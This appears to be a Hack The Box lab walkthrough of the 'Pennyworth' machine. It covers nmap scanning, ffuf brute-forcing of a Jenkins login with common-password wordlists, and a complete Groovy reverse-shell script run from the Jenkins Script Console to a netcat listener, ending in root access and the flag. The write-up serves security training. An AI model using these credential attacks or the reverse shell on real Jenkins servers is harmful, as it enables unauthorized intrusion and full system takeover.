09.PENNYWORTH (GROOVY SCRIPTING & REVERSE SHELL)
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpnENUMERATE SERVICES
root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
PORT STATE SERVICE VERSION
8080/tcp open http Jetty 9.4.39.v20210325
* Typically '-sV' is used with Nmap to determine versions, but that's not always enough.
- adding the -sC is another good way to determine service versions
- the -sC option will run safe scripts which are designed to provide useful
information without being too intrusive or causing harm to the target systems.VULNERABILITY SCANNING
root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 8080
PORT STATE SERVICE VERSION
8080/tcp open http Jetty 9.4.39.v20210325
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.39.v20210325)
| http-robots.txt: 1 disallowed entry
|_/
* the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
scripts for service enumeration, version detection, and other basic checks.
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 8080
PORT STATE SERVICE
8080/tcp open http-proxy
| http-enum:
|_ /robots.txt: Robots file
* the --script=vuln will run scripts that focus specifically on detecting known
vulnerabilities in the service running on port 6379
- e.g., weak configurations, or known vulnerabilities in the redis service
- if no results are found then the service may be fully patched!FOOTHOLD/COMPROMISE
Submit root flag
#walk the application and identify potential entry points
root@htb:~$ BROWSER > http://10.129.223.232:8080/robots.txt
# we don't want robots to click "build" links
User-agent: *
Disallow: /
root@htb:~$ BROWSER > {targetIP:port}
Welcome to Jenkins!
* possible vulnerable entry points
- login form
- could be vulnerable to brute force attacks
root@htb:~$ BROWSER > {targetSite:port}
username: null
password: null
Invalid username or password
* submit expected inputroot@htb:~$ find / -iname usernames 2>/dev/null
/usr/share/seclists/Usernames
root@htb:~$ ls
top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .
root@htb:~$ find / -iname passwords 2>/dev/null
/usr/share/seclists/Passwords
root@htb:~$ ls
500-worst-passwords.txt
root@htb:~$ cp /usr/share/seclists/Passwords/500-worst-passwords.txt .
root@htb:~$ burpsuite
BURP > Proxy > BROWSER
URL: 10.129.178.161:8080
- Forward requests until the full page is loaded
BURP > BROWSER > http://10.129.178.161:8080/login?from=%2F
Welcome to Jenkins!
Username: null
Password: null
BURP > Proxy > BROWSER
Requests
...
POST /j_spring_security_check HTTP/1.1
Host: 10.129.178.161:8080
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.129.178.161:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.129.178.161:8080/login?from=%2F
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID.9d35f114=node01hvgj3wjo0ofrnt7s0zzlo2ew0.node0
Connection: close
j_username=null&j_password=null&from=%2F&Submit=Sign+in
right-click on the "request" section > copy to file
Filename: requests.txt
File Type: All Files
root@htb:~$ nano requests.txt
...
j_username=unameFUZZ&j_password=pwFUZZ&from=%2F&Submit=Sign+in
* add the {FUZZ} markers to the username/password section
root@htb:~$ ffuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:UFUZZ -w pWord.txt:PFUZZ -c -fr "Invalid username or password"
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 14ms]
* PFUZZ: root
* UFUZZ: admin
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 17ms]
* PFUZZ: password1
* UFUZZ: admin
root@htb:~$ fuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:unameFUZZ -w pWord.txt:pwFUZZ -c -fr "Invalid username or password" -r
[Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 87ms]
* PFUZZ: admin1
* UFUZZ: root
[Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 96ms]
* PFUZZ: password
* UFUZZ: root
[Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 87ms]
* PFUZZ: root
* UFUZZ: root
[Status: 200, Size: 17514, Words: 1111, Lines: 33, Duration: 78ms]
* PFUZZ: password1
* UFUZZ: root
[Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 88ms]
* PFUZZ: admin
* UFUZZ: root
root@htb:~$ root@htb:~$ fuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:unameFUZZ -w pWord.txt:pwFUZZ -c -fr "Invalid username or password" -r -fs 19540
* the -c flag outputs the result in color
* the -r flag follows HTTP redirects during fuzzing
* the -fs flag filters results based on content size
* the -fr flag filters results based on a regex pattern.
* the final result will contain a handful of possible credentials to use#
root@htb:~$ nc -nlvp 8088
root@htb:~$ BROWSER > http://10.129.178.161:8080
username: root
password: password
JENKINS > Manage Jenkins > Script Console
Thread.start {
String host="{attackerIP}";
int port=8088;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port); InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
}
* click the "run" button to have the target connect to the attacker's netcat serverroot@htb:~$ nc...
listening on [any] 8088 ...
connect to [10.10.14.215] from (UNKNOWN) [10.129.178.161] 51444
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
find / -iname flag.txt 2>/dev/null
/root/flag.txt
cat /root/flag.txt
9cdfb439c7876e703e307864c9167a15Last updated
